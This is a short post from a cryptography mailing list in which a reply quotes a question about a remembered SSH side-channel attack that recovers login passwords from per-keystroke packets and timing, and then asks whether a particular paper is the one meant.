[Cryptography] SSH vulnerability when using passwords

Jonathan Katz jkatz at cs.umd.edu
Tue Jan 6 20:01:09 EST 2015

On Tue, Jan 6, 2015 at 6:42 PM, John Gilmore <gnu at toad.com> wrote:
> A friend pointed me to this page:
>   https://stribika.github.io/2015/01/04/secure-secure-shell.html
> But neither that nor the ssh wikipedia page mention an SSH
> vulnerability that lets an attacker guess the letters of a remote
> login password used under SSH.  I remember this attack being mentioned
> years ago, perhaps in a crypto conference rump session?
> The attack works when you don't use keys or shared secrets -- just the
> usual login/password processing standard for the remote end's
> operating system.  This is by far the simplest way to use SSH -- it
> requires no public keys, no private keys, no one-time pads.  All it
> requires is that you can remember your login name and password, which
> everyone is already used to.  It lets you log in to a remote system
> from *anywhere* that has a copy of ssh, without bringing any keying
> material along.
> The problem is that the ssh protocol sends each letter of the password
> as an entire packet of encrypted stuff -- but there are only a small
> number of possible letters that might have been typed.  So the entropy
> in each of those early ssh packets is very low.  The attack makes
> guesses about which letters you might have picked, is able to
> eliminate many of the guesses by showing that the crypto would have
> produced something different in that case, relies partly based on the
> inter-letter timing as I recall, and recovers passwords or partial
> passwords a significant fraction of the time.  Then, of course, those
> passwords are extremely useful in breaking into the remote system at
> any time afterward.  Which is why NSA would store them for later use.

Could it possibly be this one?

More information about the cryptography mailing list